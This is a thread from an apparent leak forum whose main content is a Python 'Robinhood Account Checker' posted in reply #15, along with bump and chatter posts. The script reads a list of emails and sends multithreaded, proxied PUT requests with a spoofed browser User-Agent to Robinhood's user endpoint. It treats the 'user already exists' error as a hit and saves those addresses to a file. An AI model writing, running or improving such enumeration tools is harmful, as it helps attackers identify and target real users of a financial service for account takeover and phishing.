Navigation X
ALERT
Click here to register in a few steps and explore everything we have to offer!



   4609

[SOURCE CODE] Robinhood VM

by disgustCI - 25 May, 2025 - 08:11 PM
This post is by a banned member (disgustCI) - Unhide
disgustCI  
Registered
13
Posts
3
Threads
Bumped #9
This is a bump
This post is by a banned member (blackjackmac) - Unhide
13
Posts
0
Threads
#10
Does it work? Why was he banned?
This post is by a banned member (pryoxiss) - Unhide
pryoxiss  
Registered
44
Posts
0
Threads
#11
[font]what is this[/font]
This post is by a banned member (Meth9884) - Unhide
Meth9884  
Registered
27
Posts
0
Threads
#12
ty let's see
This post is by a banned member (FantaExotic) - Unhide
This post is by a banned member (coldasf100) - Unhide
17
Posts
0
Threads
#14
(25 May, 2025 - 08:11 PM)disgustCI Wrote: Show More
Robinhood VM
Like + Rep for more leaks

Show ContentSpoiler:

2222fff22f2f
This post is by a banned member (Soldering) - Unhide
Soldering  
Infinity
169
Posts
27
Threads
6 Years of service
#15
(This post was last modified: 11 August, 2025 - 11:07 AM by Soldering.)
Code:
 
###########################################################
#                                                         #
#        Robinhood Account Checker - Expanded Version     #
#        Improved for robustness and maintainability      #
#                                                         #
###########################################################

import requests
import json
import re
import time
import logging
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
from enum import Enum

# Initialize colorama for colored console output.
# autoreset=True resets color codes after every print, so stray color state
# cannot leak into later lines (the script still appends Style.RESET_ALL
# explicitly when printing Status values).
init(autoreset=True)

# --- Configuration ---

# Setup basic logging to a file and to the console.
# Two handlers mirror every record: one to "checker.log" in the working
# directory, one to the console stream.
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s',
    handlers=[
        logging.FileHandler("checker.log"),
        logging.StreamHandler()
    ]
)

# Regular expression for validating email format.
# Compiled once at import time; used by check_email() as a cheap local
# pre-filter before any network request is made.
EMAIL_PATTERN = re.compile(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$')

# --- Helper Classes and Functions ---

class Status(Enum):
    """Enumeration for check results.

    Each member's value is its label prefixed with a colorama color code so
    it can be printed directly; the caller appends Style.RESET_ALL itself
    when formatting output.
    """
    VALID = f"{Fore.GREEN}VALID"                  # account already exists for the email
    INVALID = f"{Fore.RED}INVALID"                # email is available (no account)
    RATE_LIMITED = f"{Fore.YELLOW}RATE_LIMITED"   # API answered HTTP 429
    ERROR = f"{Fore.MAGENTA}ERROR"                # network/proxy error or unexpected response
    BAD_FORMAT = f"{Fore.CYAN}BAD_FORMAT"         # failed the local EMAIL_PATTERN regex

def load_config():
    """Load settings from ``config.json`` in the working directory.

    Optional keys are filled with defaults so later code can rely on them:
    ``threads`` (10), ``timeout`` (10 seconds), and ``proxy`` (None).

    Returns:
        dict: The parsed configuration with defaults applied.

    Raises:
        SystemExit: With status 1 if the file is missing or is invalid JSON.
    """
    # Keep the try body minimal: only the open/parse can raise here.
    try:
        with open("config.json", "r") as f:
            config = json.load(f)
    except FileNotFoundError:
        logging.critical("config.json not found! Please create it.")
        # raise SystemExit(1) instead of bare exit(): exit() is a site-module
        # convenience not guaranteed in every runtime, and it exited with
        # status 0 despite being a fatal error.
        raise SystemExit(1)
    except json.JSONDecodeError:
        logging.critical("config.json is not valid JSON. Please fix it.")
        raise SystemExit(1)

    # Set default values for optional settings.
    config.setdefault("threads", 10)
    config.setdefault("timeout", 10)
    config.setdefault("proxy", None)

    return config

def get_proxies(proxy_string):
    """Format a proxy address for the requests library.

    Args:
        proxy_string (str | None): Proxy as ``host:port`` (optionally with
            credentials embedded), or a falsy value for no proxy.

    Returns:
        dict | None: Mapping suitable for requests' ``proxies=`` argument,
        or None when no proxy is configured.
    """
    if not proxy_string:
        return None
    proxy_url = f"http://{proxy_string}"
    return {
        "http": proxy_url,
        # Bug fix: the key was mistyped as "httpsias", so HTTPS requests
        # (including the api.robinhood.com calls this script makes) silently
        # bypassed the proxy. requests only honors the "https" key.
        "https": proxy_url,
    }

# --- Core Logic ---

def check_email(email: str, session: requests.Session, timeout: int):
    """Classify a single email address via the Robinhood user endpoint.

    The address is first validated locally against EMAIL_PATTERN; only
    well-formed addresses trigger a network request.

    Args:
        email (str): The email address to check.
        session (requests.Session): Session used for the PUT request.
        timeout (int): Request timeout in seconds.

    Returns:
        tuple[Status, str]: The result status and the email (or a detail
        string for error cases).
    """
    # Cheap local pre-filter: skip the network entirely for malformed input.
    if not EMAIL_PATTERN.match(email):
        return Status.BAD_FORMAT, email

    try:
        response = session.put(
            "https://api.robinhood.com/user/",
            json={"email": email},
            timeout=timeout,
        )
        code = response.status_code

        # HTTP status is the primary signal; the JSON body only
        # disambiguates the 400 case.
        if code == 200:
            # 200 with a prompt for more fields: the email is available,
            # i.e. no existing account ("invalid" for our purposes).
            return Status.INVALID, email
        if code == 429:
            # Explicit rate-limit signal from the API.
            return Status.RATE_LIMITED, email
        if code == 400:
            body = response.json()
            if "A user with this email already exists." in body.get("email", []):
                return Status.VALID, email
            # Any other 400 error is unexpected.
            return Status.ERROR, f"{email} | Unexpected 400 Response: {response.text}"

        # Anything else is an unexpected status code.
        return Status.ERROR, f"{email} | Status: {code} | Response: {response.text}"

    except requests.exceptions.ProxyError:
        return Status.ERROR, f"{email} | Proxy Error"
    except requests.exceptions.ConnectTimeout:
        return Status.ERROR, f"{email} | Connection Timeout"
    except requests.exceptions.RequestException as e:
        return Status.ERROR, f"{email} | Request Exception: {e}"

# --- Main Execution ---

def main():
    """Orchestrate the run: load config and emails, fan out checks, report."""
    cfg = load_config()
    thread_count = cfg["threads"]
    request_timeout = cfg["timeout"]
    proxy_map = get_proxies(cfg["proxy"])

    # Read targets; a set deduplicates and drops blank lines.
    try:
        with open("emails.txt", "r") as handle:
            targets = {stripped for stripped in (raw.strip() for raw in handle) if stripped}
        if not targets:
            logging.warning("emails.txt is empty. Nothing to do.")
            return
    except FileNotFoundError:
        logging.critical("emails.txt not found! Please create it and add emails to check.")
        return

    logging.info(f"Loaded {len(targets)} unique emails. Starting checker with {thread_count} threads.")

    # One Session gives connection pooling plus shared headers/proxies.
    with requests.Session() as session:
        session.headers.update({
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
            "Content-Type": "application/json"
        })
        if proxy_map:
            session.proxies.update(proxy_map)

        with ThreadPoolExecutor(max_workers=thread_count) as pool:
            # Map each submitted future back to its email for error reporting.
            jobs = {
                pool.submit(check_email, addr, session, request_timeout): addr
                for addr in targets
            }

            for done in as_completed(jobs):
                try:
                    status, message = done.result()

                    print(f"[{status.value}{Style.RESET_ALL}] {message}")

                    if status == Status.VALID:
                        # Append hits as they arrive so a crash loses nothing.
                        with open("output_valid.txt", "a") as out:
                            out.write(f"{message}\n")
                    elif status == Status.RATE_LIMITED:
                        logging.warning("Rate limit hit. Consider reducing threads or adding a delay.")
                        # A global sleep or paused submission could go here.

                except Exception as exc:
                    failed = jobs[done]
                    logging.error(f"An unexpected error occurred for email {failed}: {exc}")

    logging.info("Checking complete.")

if __name__ == "__main__":
    main()


I've updated the main.py file to better handle requests 

Not sure what OP was doing but the original was shit.
This post is by a banned member (drax2025) - Unhide
drax2025  
Registered
12
Posts
0
Threads
#16
lmao

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)